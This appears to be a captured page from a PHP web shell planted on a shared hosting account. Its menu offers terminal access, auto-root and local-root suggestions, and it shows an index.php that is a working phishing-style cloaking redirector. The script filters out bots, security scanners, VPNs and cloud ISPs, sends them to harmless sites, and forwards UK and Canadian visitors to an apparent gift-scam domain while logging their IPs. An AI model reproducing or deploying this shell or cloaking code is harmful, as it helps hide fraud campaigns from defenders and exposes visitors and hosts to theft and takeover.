Linux server218.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.163 & Your IP : 216.73.216.49
Domains :
Cant Read [ /etc/named.conf ]
User : juloluaq
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
juloluaq /
public_html /
en /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2025-11-17 08:18
index.php
8.88
KB
-rw-r--r--
2025-10-30 01:33
logs.txt
2.34
KB
-rw-r--r--
2025-10-30 09:17
Save
Rename
<?php ob_start(); date_default_timezone_set('America/Toronto'); $redirect_link = "https://survbootsuksgifts.com/check/"; $log_file = __DIR__ . "/logs.txt"; $allowed_countries = ['United Kingdom', 'UK', 'GB']; $blocked_keywords = [ // Cloud providers & datacenters 'amazon', 'aws', 'google', 'gcp', 'microsoft', 'azure', 'ovh', 'digitalocean', 'do-', 'hetzner', 'linode', 'contabo', 'oracle', 'cloud', 'cloudflare', 'cdn', 'akamai', 'fastly', 'vercel', 'render', 'fly.io', 'upcloud', 'scaleway', 'vultr', 'packet', 'nocix', 'leaseweb', 'datacamp', 'sharktech', 'colo', 'kdatacenter', 'ipxo', 'rfc1918', 'ipv6', 'host', 'hosting', 'server', 'servers', 'data center', 'data-center', 'seedbox', 'liquidweb', 'softlayer', 'online.net', 'kimsufi', 'netprotect', 'anonymizer', 'privado', 'purevpn', // VPNs & Proxies 'surfshark', 'nordvpn', 'expressvpn', 'hide.me', 'openvpn', 'pia', 'airvpn', 'protonvpn', 'cyberghost', 'tor', 'exit node', 'vpn', 'proxy', 'tunnel', 'residential', 'ipqualityscore', 'brightdata', 'oxylabs', 'smartproxy', 'luminati', 'residential proxy', 'datacenter proxy', 'crawlera', 'zenrows', 'scrapinghub', 'scrapingbee', 'serpapi', 'apify', 'zyte', // New additions 'ipvanish', 'windscribe', 'tunnelbear', 'hotspot shield', 'hideipvpn', 'vyprvpn', 'geoedge', 'datadome', 'perimeterx', 'cloudmask', 'incapsula', 'imperva', 'stackpath', 'keycdn', 'belugacdn', 'cdn77', 'bunny.net', 'gcore' ]; $bot_patterns = [ // HTTP clients & libraries 'curl', 'wget', 'python', 'python-requests', 'libwww', 'httpclient', 'aiohttp', 'urllib', 'mechanize', 'node-fetch', 'axios', 'go-http-client', 'okhttp', 'cfnetwork', 'java', 'jakarta', 'fetch', 'http-request', 'postmanruntime', 'insomnia', 'powershell', 'httpx', 'ruby', 'perl', 'php', 'rust', 'scala', 'erlang', // Bot identifiers 'bot', 'crawler', 'spider', 'scraper', 'headless', 'phantomjs', 'screaming frog', 'puppeteer', 'playwright', 'slimerjs', 'selenium', 'ghost', 'htmlunit', 'webdriver', 'automation', 'script', 'monitor', 'checker', // Search engine bots 'googlebot', 'bingbot', 'yahoo! slurp', 'yandexbot', 'duckduckbot', 'baiduspider', 'sogou', 'exabot', 'facebookexternalhit', 'facebot', 'twitterbot', 'linkedinbot', 'embedly', 'quora link preview', 'pinterest', 'slackbot', 'vkshare', 'rogerbot', 'ahrefs', 'mj12bot', 'semrush', 'dotbot', 'petalbot', 'bytespider', 'serpstatbot', 'seekport', 'seznambot', 'meta', 'scrapy', 'crawlera', 'zyte', 'zenrows', 'apify', 'scrapinghub', 'serpapi', // New bot patterns 'dataforseo', 'megaindex', 'linkdex', 'meanpath', 'mojeek', 'discordbot', 'telegrambot', 'whatsapp', 'applebot', 'ccbot', 'cliqzbot', 'duckduckgo', 'ecosia', 'gigablast', 'moatbot', 'netcraft', 'nimbostratus', 'pageburst', 'panopta', 'pingdom', 'prerender', 'qwantify', 'screaming', 'siteaudit', 'sputnik', 'statuscake', 'uptimebot', 'ubermetrics', 'zgrab' ]; // Get next log entry number for ALLOWED connections only function get_log_index($log_file) { if (!file_exists($log_file)) { return 1; } $content = file_get_contents($log_file); if (empty($content)) { return 1; } $lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $allowed_lines = array_filter($lines, function($line) { return strpos($line, '[ALLOWED]') !== false; }); if (empty($allowed_lines)) { return 1; } $last_line = trim(end($allowed_lines)); if (preg_match('/^(\d+)\. \[ALLOWED\]/', $last_line, $match)) { return (int)$match[1] + 1; } return 1; } function redirect_to_random_site_and_exit() { $sites = [ 'https://www.google.ca', 'https://www.cbc.ca', 'https://www.gov.on.ca', 'https://www.amazon.ca', 'https://www.walmart.ca' ]; $random_site = $sites[array_rand($sites)]; header("Location: $random_site"); exit; } function get_client_ip() { $keys = ['HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_FORWARDED_FOR','HTTP_FORWARDED','REMOTE_ADDR']; foreach ($keys as $key) { if (!empty($_SERVER[$key])) { $iplist = explode(',', $_SERVER[$key]); return trim($iplist[0]); } } return 'UNKNOWN'; } function get_geo_info($ip) { // IP-API.COM - FREE cu 150 requests/minut if ($ip === '127.0.0.1' || $ip === '::1' || $ip === 'UNKNOWN') { return ['country' => 'Localhost', 'isp' => 'Local']; } $url = "http://ip-api.com/json/{$ip}?fields=status,message,country,countryCode,isp,org,query"; $context = stream_context_create([ 'http' => [ 'timeout' => 5, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = @file_get_contents($url, false, $context); if ($response !== false) { $data = json_decode($response, true); if (isset($data['status']) && $data['status'] === 'success') { return [ 'country' => $data['country'] ?? 'Unknown', 'isp' => strtolower($data['isp'] ?? $data['org'] ?? 'unknown') ]; } } // Fallback pentru erori return ['country' => 'Unknown', 'isp' => 'unknown']; } // === VERIFICARI === // 1. Verificare JavaScript obligatorie if (empty($_COOKIE['js_verified'])) { setcookie('js_verified', '1', time() + 3600, '/'); echo "<html><head> <title>Loading...</title> <script> setTimeout(function() { window.location.reload(); }, 100); </script> </head><body> <noscript> <meta http-equiv='refresh' content='0;url=https://www.google.ca/'> </noscript> <div style='text-align: center; margin-top: 50px;'> <h2>Verifying browser...</h2> </div> </body></html>"; exit; } // 2. Verificare User-Agent $ip = get_client_ip(); $user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? 'unknown'); $date = date("Y-m-d H:i:s"); // Verificare User-Agent gol sau prea scurt if (empty($user_agent) || $user_agent === 'unknown' || strlen($user_agent) < 20) { file_put_contents($log_file, "[NO UA BLOCKED] $ip | $date\n", FILE_APPEND | LOCK_EX); redirect_to_random_site_and_exit(); } // 3. Verificare bot patterns foreach ($bot_patterns as $bot) { if (strpos($user_agent, $bot) !== false) { file_put_contents($log_file, "[BOT BLOCKED] $ip | UA: $user_agent | $date\n", FILE_APPEND | LOCK_EX); redirect_to_random_site_and_exit(); } } // 4. Verificare IP ?i ?ara cu IP-API.COM $geo_info = get_geo_info($ip); $country = $geo_info['country']; $isp = $geo_info['isp']; // Log pentru debugging file_put_contents($log_file, "[DEBUG] $ip | Country: $country | ISP: $isp | API: ip-api.com\n", FILE_APPEND | LOCK_EX); // 5. Verificare keyword blocking foreach ($blocked_keywords as $keyword) { if (strpos($isp, $keyword) !== false || strpos($user_agent, $keyword) !== false) { file_put_contents($log_file, "[BLOCKED ISP/UA] $ip | ISP: $isp | Country: $country | $date | UA: $user_agent\n", FILE_APPEND | LOCK_EX); redirect_to_random_site_and_exit(); } } // 6. Verificare ?ara - METODA IMBUNATA?ITA $country_match = false; foreach ($allowed_countries as $allowed_country) { if (stripos($country, $allowed_country) !== false) { $country_match = true; break; } } // Daca ?ara este Unknown, �ncercam cu country code if (!$country_match) { // Refacem request-ul pentru country code $url = "http://ip-api.com/json/{$ip}?fields=countryCode"; $response = @file_get_contents($url); if ($response !== false) { $data = json_decode($response, true); if (isset($data['countryCode']) && $data['countryCode'] === 'CA') { $country_match = true; $country = 'Canada'; } } } if (!$country_match) { file_put_contents($log_file, "[BLOCKED COUNTRY] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND | LOCK_EX); redirect_to_random_site_and_exit(); } // === Daca a trecut toate verificarile === // Log allowed visitor $log_index = get_log_index($log_file); file_put_contents($log_file, "{$log_index}. [ALLOWED] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND | LOCK_EX); // Generate unique code $unique_code = bin2hex(random_bytes(200)); // Redirect with parameters if (!headers_sent()) { if (!empty($_GET['userid'])) { $user_id = urlencode($_GET['userid']); header("Location: {$redirect_link}?code={$user_id}&session={$unique_code}"); } else { header("Location: {$redirect_link}?sessionid={$unique_code}"); } } exit; ?>